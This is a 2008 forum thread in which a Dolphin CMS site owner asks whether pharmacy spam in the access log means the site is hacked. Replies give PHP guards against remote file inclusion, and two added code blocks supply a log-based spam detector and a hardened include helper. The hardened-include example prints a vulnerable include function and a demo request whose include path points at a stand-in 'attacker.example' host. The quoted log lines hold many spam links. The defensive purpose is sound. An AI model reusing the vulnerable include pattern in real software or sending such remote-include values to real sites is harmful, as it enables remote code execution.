is my site hacked?

sbond posted 28th of September 2008 in Community Voice. 20 comments.

Recently I found out that my webserver is overloaded. I viewed the access log and found entries like this:

62.112.193.34 - - [28/Sep/2008:12:16:22 +0400] "GET /Alina11_22?CmtText=pharmacy%3B+http%3A%2F%2Fwww.da.eng.ufmg.br%2Fforum%2Fviewtopic.php%3Fp%3D6172%236172+hoodia+en+pharmacie%3B+http%3A%2F%2Fcontent.ix2.net%2Fshowthread.php%3Fp%3D66277%23post66277+cialis+substitute%3B+http%3A%2F%2Fwww.acidpit.info%2Fviewtopic.php%3Fp%3D26550%2326550+alternative+to+cialis%3B+http%3A%2F%2Fwww.alladstop.com%2Fforums%2Fviewtopic.php%3Fp%3D711623%23711623+hoodia+gordini%3B+http%3A%2F%2Firadepuiff.ru%2Fforum%2Fviewtopic.php%3Fp%3D1018%231018+tratamientos+para+la+eyaculacion+precoz%3B+http%3A%2F%2Ftricitiesultimate.com%2Fphpbb%2Fviewtopic.php%3Fp%3D32953%2332953+natural+cialis%3B+http%3A%2F%2Fjuegos.tv%2Fconsolas%2Fforo%2Fviewtopic.php%3Fp%3D1528%231528+natural+male+enhancement+products%3B+http%3A%2F%2Fwww.sportlinksnetwork.com%2Fkayakfishing%2Fviewtopic.php%3Fp%3D149537%23149537+natural+alternative+to+cialis%3B+http%3A%2F%2Fthebravehearts.org%2FBB%2Fviewtopic.php%3Fp%3D75269%2375269+cialis+substitute%3B+http%3A%2F%2F163.26.133.1%2Fxoops228%2Fmodules%2Fnewbb%2Fviewtopic.php%3Ftopic_id%3D161170%26post_id%3D285757%26order%3D0%26viewmode%3Dflat%26pid%3D0%26forum%3D3%23forumpost285757+%C3%A9jaculation+pr%C3%A9matur%C3%A9e%3B+http%3A%2F%2Fblogdogs.co.uk%2Fviewtopic.php%3Fp%3D94481%2394481+curar+la+eyaculacion+precoz%3B+http%3A%2F%2Fwww.dipolognon.com%2Fkagayanonforum%2Fviewtopic.php%3Fp%3D38546%2338546+natural+cialis%3B+http%3A%2F%2Fwww.tibha.com%2FForums%2Fviewtopic.php%3Fp%3D440394%23440394+alternative+to+cialis%3B+http%3A%2F%2Fyour20.net%2Fmodules.php%3Fname%3DForums%26file%3Dviewtopic%26p%3D58746%2358746+help+last+longer+in+bed%3B+http%3A%2F%2Fwww.game.bg%2Fforum%2Fviewtopic.php%3Fp%3D21480%2321480+hoodia+side+effects%3B+http%3A%2F%2Flost.forumche.org%2Fviewtopic.php%3Fp%3D36%2336+last+longer+in+bed%3B+http%3A%2F%2Fwww.ethelredtmo.org%2FphpBB2%2Fviewtopic.php%3Fp%3D195121%23195121+alternative+to+cialis%3B+http%3A%2F%2Fwww.gelreband.nl%2Fforum%2F%2Fviewtopic.php%3Fp%3D351027%23351027+alternative+to+cialis%3B+http%3A%2F%2Fwww.nevadamoms.org%2Fforums%2Fshowthread.php%3Fp%3D37872%23post37872+aumento+de+tama%C3%B1o+del+pene%3B+http%3A%2F%2Fwww.gemat.biz%2Fforum%2Fviewtopic.php%3Fp%3D114%23114+cialis+substitute%3B+http%3A%2F%2Fcontent.ix2.net%2Fshowthread.php%3Fp%3D63930%23post63930+eyaculaci%C3%B3n+precoz%3B+http%3A%2F%2Ftest.wellingtonlivemusic.com%2FphpBB2%2Fviewtopic.php%3Fp%3D232%23232+taille+du+p%C3%A9nis%3B+http%3A%2F%2Fwww.cptce.it%2Fmodules%2Fnewbb%2Fviewtopic.php%3Ftopic_id%3D168929%26post_id%3D460674%26order%3D0%26viewmode%3Dflat%26pid%3D0%26forum%3D1%23forumpost460674+remedios+para+la+eyaculacion+precoz%3B+http%3A%2F%2Fwww.lesjetaime.com%2FphpBB%2Fviewtopic.php%3Ftopic%3D39975%26forum%3D3%260+hoodia+products%3B+http%3A%2F%2Ftherealhelterskelter.com%2Fchat%2F%2Fviewtopic.php%3Fp%3D345741%23345741+natural+male+enhancements%3B+http%3A%2F%2Fwww.torcn.com%2Fforum%2Fviewtopic.php%3Fp%3D461305%23461305+effective+herbal+cialis%2C%0D%3B+http%3A%2F%2Fwww.k1ck.com%2Fforum%2Fviewtopic.php%3Fp%3D350334%23350334+natural+health+hoodia%3B+http%3A%2F%2Fpuchschool2.jino-net.ru%2Fforum%2Ftopic.php%3Fforum%3D1%26topic%3D1683+%C3%A9jaculation+rapide%3B+http%3A%2F%2Fwww.bizclown.com%2FBizforum%2Fviewtopic.php%3Fp%3D316%23316+natural+cialis%3B+http%3A%2F%2Fusers.atw.hu%2Fcsocso-band%2Fforum%2Fviewtopic.php%3Fp%3D3603%233603+fr%C3%BChzeitige+ejakulation%3B+http%3A%2F%2Fpkminami.fu8.com%2Fforum%2Fviewtopic.php%3Fp%3D749%23749+natural+cialis%3B+http%3A%2F%2Farcyk.duu.pl%2Fgra%2F%2Fviewtopic.php%3Fp%3D813%23813+avis+hoodia%3B+http%3A%2F%2Fwww.funnyisraeli.com%2Fviewtopic.php%3Fp%3D442982%23442982+premature+ejactulation+%3B+http%3A%2F%2Fwww.lesjetaime.com%2FphpBB%2Fviewtopic.php%3Ftopic%3D40339%26forum%3D3%260+herbal+cialis%3B+&CmtParent=0 HTTP/1.0" 200 38919 "http://samaroid.ru/Alina11_22" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


Does it mean that my site is hacked? I see that the charge on my hosting grows at exactly that moment.

Maybe it is possible to restrict the number of characters that can be put in the browser?

 
Comments
sammie
That means your guestbooks are being spammed.

No need for profile comments and a guestbook, so delete the guestbook.php file or rename it to something different.
sbond
Thanks, sammie!
The fact is that I have already deleted the guestbook.php file... Maybe it's something else.
sammie
I posted this fix a while back.

Add the following code to your ray/modules/global/inc/content.inc.php

Add it at the top, above the first require_once command:

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

So it looks like this:

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");

This stops any remote includes being used.

Next, edit /plugins/safehtml/HTMLSax3.php and add this at the top, above the require_once:

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

So it looks like this:

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

require_once( "{$dir['plugins']}safehtml/HTMLSax3/States.php" );
require_once( "{$dir['plugins']}safehtml/HTMLSax3/Decorators.php" );

This stops remote access to your directories.

You need to move to a more secure host.
sbond
Many thanks!!! :)
I'll try it as soon as possible.
sbond
I applied this fix. Thanks once more :) So, I'm waiting for results.
AndreyP
GuestBook was totally rewritten in 6.2.
Just wait a little; nobody will be able to spam your Dolphin any more.
sbond
I'm waiting... Like all other "Delphinoids" do :)
LeonidS
This line, require_once('header.inc.php'); in ray/modules/global/content.inc.php of version 6.1.4, should help too. But the solution from Sammie is useful too; thanks, Sammie, for helping others.
sbond
I'm using version 6.1.4, so this line is already present.
praveenkv1988
This shows that somebody tried to attack your server using external file inclusion.
sbond
Thank you for the information :)
I'm using the 6.1.4 release. register_globals is off. I don't want any problems with some Dolphin parts, so I leave allow_url_fopen enabled.
sammie
allow_url_fopen is safe, but allow_url_include is not.
A server is only vulnerable if register_globals and allow_url_include are on; both should be off.
sbond
I applied all the fixes. Unfortunately I still see these long links in the access log, like

75.150.10.62 - - [30/Sep/2008:12:14:32 +0400] "GET /skandaloff464?CmtText=pharmacy%3B+http%3A%2F%2Fleto2005.variant.lv%2Fforum%2Ftopic.php%3Fforum%3D1%26topic%3D239998+soma%3B+http%3A%2F%2Fglebka.ru%2Fforum%2Fviewtopic.php%3Fp%3D314517%23314517+soma%3B+http%3A%2F%2Fantichp.mypressonline.com%2Ffor .... +soma+usa%3B+&CmtParent=0 HTTP/1.0" 200 37060 "http://samaroid.ru/skandaloff464" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

I tried to ban IPs in the .htaccess file, but it's impossible to do it every day. I'm now thinking of changing web hosting company...
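Banning source IPs by hand, as the post above describes, does not scale, and the two log lines quoted in this thread already come from two different addresses on two different days. The following is an added example and is not part of the thread or of Dolphin: it parses Apache combined-format access-log lines like the ones quoted, flags comment requests whose CmtText parameter carries several URLs, and emits an Apache 2.2 style .htaccess deny block for the source IPs. The function names, the three-URL threshold and the sample log lines are constructed for this example; the sample reuses only the request shape, IP and referer seen in the thread.

```php
<?php
// Added example (not Boonex/Dolphin code). Detects comment-spam requests in an
// Apache "combined" access log and prints an .htaccess block for the sources.

// Parse one combined-format line:
//   ip ident user [time] "METHOD url PROTO" status bytes "referer" "user-agent"
// Returns an associative array, or null if the line does not match the format.
function parseLogLine($line)
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, trim($line), $m)) {
        return null;
    }
    $url = parse_url($m[4]);
    $query = array();
    if (isset($url['query'])) {
        parse_str($url['query'], $query);   // url-decodes values (%3A -> ':', '+' -> ' ')
    }
    return array(
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => isset($url['path']) ? $url['path'] : '/',
        'query'  => $query,
        'status' => (int) $m[5],
        'ua'     => $m[8],
    );
}

// A comment submission is treated as spam when CmtText contains at least
// $minUrls links. Legitimate comments rarely carry more than one or two.
function isCommentSpam(array $entry, $minUrls = 3)
{
    if (!isset($entry['query']['CmtText'])) {
        return false;
    }
    return preg_match_all('#https?://#i', $entry['query']['CmtText'], $unused) >= $minUrls;
}

// Scan a whole log (as one string) and return array(ip => spam request count),
// most active source first.
function spamSources($logText, $minUrls = 3)
{
    $hits = array();
    foreach (preg_split('/\r?\n/', $logText) as $line) {
        $entry = parseLogLine($line);
        if ($entry !== null && isCommentSpam($entry, $minUrls)) {
            $hits[$entry['ip']] = isset($hits[$entry['ip']]) ? $hits[$entry['ip']] + 1 : 1;
        }
    }
    arsort($hits);
    return $hits;
}

// Build an Apache 2.2 mod_authz_host block: allow everyone, then deny the listed IPs.
function htaccessDenyBlock(array $hits)
{
    $out = "Order allow,deny\nAllow from all\n";
    foreach (array_keys($hits) as $ip) {
        $out .= "Deny from " . $ip . "\n";
    }
    return $out;
}

// Constructed sample: two spam posts from the IP seen in the thread and one
// ordinary comment from another address (hostnames are placeholders).
$sample = <<<'LOG'
62.112.193.34 - - [28/Sep/2008:12:16:22 +0400] "GET /Alina11_22?CmtText=pharmacy%3B+http%3A%2F%2Fa.example%2F+cialis%3B+http%3A%2F%2Fb.example%2F+hoodia%3B+http%3A%2F%2Fc.example%2F&CmtParent=0 HTTP/1.0" 200 38919 "http://samaroid.ru/Alina11_22" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
62.112.193.34 - - [28/Sep/2008:12:16:40 +0400] "GET /Alina11_22?CmtText=soma%3B+http%3A%2F%2Fa.example%2F+soma%3B+http%3A%2F%2Fb.example%2F+soma%3B+http%3A%2F%2Fc.example%2F&CmtParent=0 HTTP/1.0" 200 37060 "http://samaroid.ru/Alina11_22" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
10.0.0.5 - - [28/Sep/2008:12:17:01 +0400] "GET /Alina11_22?CmtText=nice+profile%21+see+http%3A%2F%2Fexample.org%2F&CmtParent=0 HTTP/1.0" 200 38000 "http://samaroid.ru/Alina11_22" "Mozilla/5.0"
LOG;

echo htaccessDenyBlock(spamSources($sample));
```

Run it against the real log with `$sample = file_get_contents('/path/to/access_log')`, or pipe the log in over stdin. Two caveats: a Deny list still lets the request reach Apache, so it does not remove the CPU cost of the connection, only the PHP execution; and because the spam arrives as a GET with the comment text in the query string, the same pattern can be refused before PHP ever starts with a mod_rewrite condition on the raw query string (for instance `RewriteCond %{QUERY_STRING} (http%3A%2F%2F.*){3,} [NC]` followed by `RewriteRule .* - [F]`). A comment endpoint that accepts submissions via GET at all is the underlying weakness; requiring POST with a per-session token stops this class of bot regardless of IP.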
buckmcgoo
Is the spam being recorded in your guestbook or not? If it isn't, then what they are trying isn't working. People are always going to TRY to spam you, but I wouldn't swap hosts because of that.
sbond
No, the spam is not being recorded in the guestbook; I deleted guestbook.php. But because of these attempts the webserver is overloaded and I see some alerts in the control panel of my hosting.
sammie
So they are just logs of attempts. You will always get attempts; you can't do anything about people trying.
sbond
I agree with you, sammie :) I can't do anything about people trying :) So, let them try! :)
I was very pleased to find such nice people here who, in spite of my very bad English, tried to help me :) Thank you all! I am convinced once more that I am on the right path in choosing to use Dolphin.
praveenkv1988
That won't cause any problems. When somebody tries to attack your site, these errors will be logged.
earpick
To add to the (fairly dated) discussion, I suggest you log the error as opposed to just screaming "Hacking attempt" pointlessly. Try something like this:

if (isset($_REQUEST['sIncPath'])) {
    // Log first: nothing placed after die() is ever executed.
    error_log("HACKING ATTEMPT. User with the IP of ".$_SERVER["REMOTE_ADDR"]." has attempted to hack us using ".$_SERVER["SCRIPT_FILENAME"]);
    die ('Hacking attempt');
}

This should log the error in Apache's error log. Handy!
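The guard posted by sammie and the logging suggested by earpick both work on the same idea: an include prefix such as $sIncPath must never come from the request. The following is an added example, not code from Dolphin or from anyone in this thread. It puts the pattern from the require_once lines quoted above next to a hardened replacement, and it logs the attempt safely (length-capped, control characters stripped, so the attacker cannot forge extra lines in Apache's error log). The function names are assumptions chosen for the example; the "vulnerable" function only illustrates the mechanism (an unassigned variable populated by register_globals), not a claim about any particular Dolphin release. Note that the isset() guard is a mitigation that only matters when register_globals is on; assigning $sIncPath yourself before the first require_once, as the header.inc.php line mentioned by LeonidS does, removes the bug rather than detecting it.

```php
<?php
// Added example (not Dolphin code). Vulnerable include pattern vs. hardened version.

// --- Vulnerable pattern -------------------------------------------------------
// The file never assigns $sIncPath. With register_globals=On, PHP creates it from
// ?sIncPath=... in the request, so the client picks where the include comes from.
// With a remote prefix the result is "http://attacker.example/xml.inc.php", which
// require_once will fetch and execute when allow_url_include is on (on PHP before
// 5.2.0, where allow_url_include did not exist, allow_url_fopen alone was enough).
function vulnerableIncludeTarget($sIncPath)
{
    return $sIncPath . "xml.inc.php";
}

// --- Hardened version ---------------------------------------------------------
// Returns the local include prefix, or false (after logging) when the request
// tries to supply any of the guarded names. Works whether or not register_globals
// is on, because it never reads the bare variable at all.
function safeIncludePrefix(array $request, array $server, $guarded = array('sIncPath', 'dir'))
{
    foreach ($guarded as $name) {
        if (array_key_exists($name, $request)) {
            logIncludeAttempt($name, $request[$name], $server);
            return false;
        }
    }
    // Derive the prefix from this file's own location, never from a variable.
    return dirname(__FILE__) . DIRECTORY_SEPARATOR;
}

// Write one sanitised line to the PHP/Apache error log and return it.
function logIncludeAttempt($name, $value, array $server)
{
    // Cap the length and replace anything outside printable ASCII so a value such
    // as "x\n[fake line]" cannot inject a second log entry (log injection).
    $clean = substr(preg_replace('/[^\x20-\x7e]/', '?', (string) $value), 0, 200);
    $line = sprintf('include override attempt ip=%s script=%s %s=%s',
        isset($server['REMOTE_ADDR']) ? $server['REMOTE_ADDR'] : '-',
        isset($server['SCRIPT_NAME']) ? $server['SCRIPT_NAME'] : '-',
        $name, $clean);
    error_log($line);
    return $line;
}

// How it would be used at the top of content.inc.php, before the first require_once:
//   $sIncPath = safeIncludePrefix($_REQUEST, $_SERVER);
//   if ($sIncPath === false) { header('HTTP/1.0 400 Bad Request'); exit('Bad request'); }
//   require_once($sIncPath . "xml.inc.php");

// Stand-alone demonstration with a constructed request; no file is actually included.
$attack = array('sIncPath' => "http://attacker.example/\n[fake log line]");
$server = array('REMOTE_ADDR' => '62.112.193.34',
                'SCRIPT_NAME' => '/ray/modules/global/inc/content.inc.php');

echo "vulnerable target: ", vulnerableIncludeTarget($attack['sIncPath']), "\n";
$prefix = safeIncludePrefix($attack, $server);
echo "hardened result for attack request: ", var_export($prefix, true), "\n";
$prefix = safeIncludePrefix(array('CmtText' => 'hello'), $server);
echo "hardened result for ordinary request: ", var_export($prefix, true), "\n";
```

Run from the command line, the attack request yields `false` plus one single-line entry on stderr (PHP's default error_log target under the CLI; under mod_php it lands in Apache's error log), while the ordinary comment request yields the local directory prefix. Returning false instead of calling die() inside the helper keeps the decision (400, redirect, silent drop) in the caller and makes the guard testable.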
 
 